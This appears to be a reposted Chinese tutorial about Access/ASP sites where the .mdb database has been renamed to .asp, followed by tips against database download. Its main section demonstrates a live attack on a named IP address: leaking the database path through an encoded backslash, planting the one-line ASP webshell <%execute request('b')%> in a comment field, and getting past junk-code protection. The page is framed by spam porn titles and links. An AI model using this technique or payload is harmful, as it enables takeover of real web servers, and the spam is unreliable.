麻豆小视频在线观看_中文黄色一级片_久久久成人精品_成片免费观看视频大全_午夜精品久久久久久久99热浪潮_成人一区二区三区四区

首頁 > 編程 > ASP > 正文

access改mdb為asp所帶來的災難 附mdb防下載方法

2024-05-04 11:08:31
字體:
來源:轉載
供稿:網友
可能是隨著網絡安全技術的發(fā)展吧,管理員的素質都在提高,在使用access+asp系統(tǒng)時,為不數(shù)據(jù)庫被人下載,到把mdb改為asp或asa。
 
 
 
先不說直接改后綴,直接可以用網快等工具直接下載,其實這樣你已經是為入侵者打開了大門。入侵者可以利用asp/asa為后綴的數(shù)據(jù)庫直接得到webshell。 

一.思路 

  大家都知道<%%>為asp文件的標志符,也就是說一個asp文件只會去執(zhí)行<%%>之間的代碼,access+asp的web系統(tǒng)的所有數(shù)據(jù)都是存放在數(shù)據(jù)庫文件里(mdb文件),由于管理者把mdb文件改為了asp文件,如果我們提交的數(shù)據(jù)里包含有<%%>,那當我們訪問這個asp數(shù)據(jù)庫的時候就會去執(zhí)行<%%>之間的代碼。這樣導致我們只提交惡意代碼給數(shù)據(jù)庫,那么asp后綴的數(shù)據(jù)庫就是我們的webshell了。 

二.示例 

  隨便找個目標,首先我們暴庫,看是不是asp后綴的數(shù)據(jù)庫:http://220.170.151.103/test/dlog%5cshowlog.asp?cat_id=5&log_id=210 


  返回: 
復制代碼代碼如下:

Microsoft VBScript 編譯器錯誤 錯誤 '800a03f6' 
缺少 'End' 

/iisHelp/common/500-100.asp,行242 

Microsoft JET Database Engine 錯誤 '80004005' 

'D:/log_mdb/%29dlog_mdb%29.asp'不是一個有效的路徑。 確定路徑名稱拼寫是否正確,以及是否連接到文件存放的服務器。 

/test/conn.asp,行18 


  我們提交:http://220.170.151.103/test/dlog/log_mdb/%2529dlog_mdb%2529.asp返回一堆的亂碼,這樣我們可以直接用網際快車等工具直接下載數(shù)據(jù)庫(這里我們不討論)。我們回到主頁看到有提供“網友評論”功能。我們注冊個用戶,發(fā)一條評論: 

<%execute request("b")%> 

  這樣我們就把asp代碼:<%execute request("b")%>寫入了數(shù)據(jù)庫,那么數(shù)據(jù)庫:就是我們的webshell咯。提交:http://220.170.151.103/test/dlog/log_mdb/%2529dlog_mdb%2529.asp在亂碼的最后我們看到: 

復制代碼代碼如下:

/iisHelp/common/500-100.asp,行242 
Microsoft VBScript 運行時錯誤 錯誤 '800a000d' 

類型不匹配: 'execute' 

/test/dlog/log_mdb/%29dlog_mdb%29.asp,行1266 


  注意:我們在向數(shù)據(jù)庫提交代碼時,代碼內容不可以太大。所以我們采用<%execute request("b")%>。 

三.其他一些問題和思路 

 ?。保畬τ诟牧撕缶Y為asp,還對數(shù)據(jù)庫里加入了<%='a'-1%>等非法的asp代碼來徹底防止下載的數(shù)據(jù)庫,由于里面存在了非法的asp代碼,插入我們的webshell代碼后運行,將只會顯示前面非法代碼的錯誤,而不去執(zhí)行我們shell的代碼。雖然這樣可以防止一定的攻擊,但還是存在一定的隱患,我們只要在出錯的代碼前加入兼容錯誤的代碼,就可以得到正確顯示執(zhí)行我們插入的webshell代碼了。 

 ?。玻畬τ跊]有改后綴的,也就是mdb文件,這樣我們可以先直接下載下來得到后臺密碼,進了后臺,可以利用數(shù)據(jù)庫備用改后綴為asp。 

mdb防下載方法小結

1:在iis6下面 如果一個擴展名沒有被定義則 訪問的時候會出現(xiàn)文件沒有找到的404錯誤。 
因此你可以將數(shù)據(jù)庫任意命名成一個絕對不會出現(xiàn)的文件名就可以達到安全的效果比如:xxxxx.xxxxxxxxxxx 


2 將數(shù)據(jù)庫放在網站的外部,那絕對就不能訪問得到了。例如: e:/web/是你的網站 
則把數(shù)據(jù)庫放在e:/ 

3 正如樓上所說的 將.mdb 改成 .asp 同時倒入一個特殊的表 包含 <% 的二進制字符 這樣訪問文件出現(xiàn) 缺少腳本關閉符的提示。 
4 或者將.mdb 改成.asp 同時用winhex打開 可以發(fā)現(xiàn)176以后有很長一部分 00 字符串 你隨便在處改成一段asp代碼 也可以實現(xiàn)防止下載,這樣也不影響數(shù)據(jù)庫功能。例如: 
<% 
response.write("非法訪問") 
response.end() 
%> 


現(xiàn)在在數(shù)據(jù)庫的名稱里 加上 “#” 和空格 都被破解了 比如“#” = “<%35” 而空格 = “<%20” 

所以說 現(xiàn)在用這些已經不管用了。。 


如果是自己的服務器的話就在IIS里設置一下: 

新建一個空白的DLL文件,然后在IIS里添加映射,可執(zhí)行文件選剛才建的這個DLL,擴展名填.mdb,保存后重啟一下IIS服務即可。

發(fā)表評論 共有條評論
用戶名: 密碼:
驗證碼: 匿名發(fā)表
主站蜘蛛池模板: 国内精品免费一区二区2001 | 久久国产精品二国产精品 | av在线免费播放网站 | 亚洲骚综合| 久久精品视频首页 | 久草成人在线观看 | 国产人成免费爽爽爽视频 | 久久99精品国产99久久6男男 | 亚洲一区中文字幕 | 亚洲第五色综合网 | 96视频在线免费观看 | 亚洲aⅴ免费在线观看 | 一区二区三区手机在线观看 | 日本大片在线播放 | 久久影库 | 91社区电影| 久久久久夜色精品国产老牛91 | 中文日产幕无线码6区免费版 | 久久国产精品免费视频 | 成人福利在线观看 | 中国av一级片 | 亚洲一级毛片 | 国产精品一区二区免费在线观看 | 黄色视屏免费在线观看 | 精品久久久久久久久久久久久久 | 99精品国产成人一区二区 | 久久久久久久一区二区三区 | 色婷婷av一区二区三区久久 | 国产一区二区在线免费观看 | 日韩黄色av网站 | 欧美a视频在线观看 | 最新精品在线 | 男女羞羞视频在线观看免费 | 久久人人爽人人爽人人片av高请 | 久久99综合久久爱伊人 | 国产午夜精品久久久久婷 | xxxx69hd一hd | 黄色片视频观看 | www亚洲| 久久精品日产高清版的功能介绍 | 成人免费毛片片v |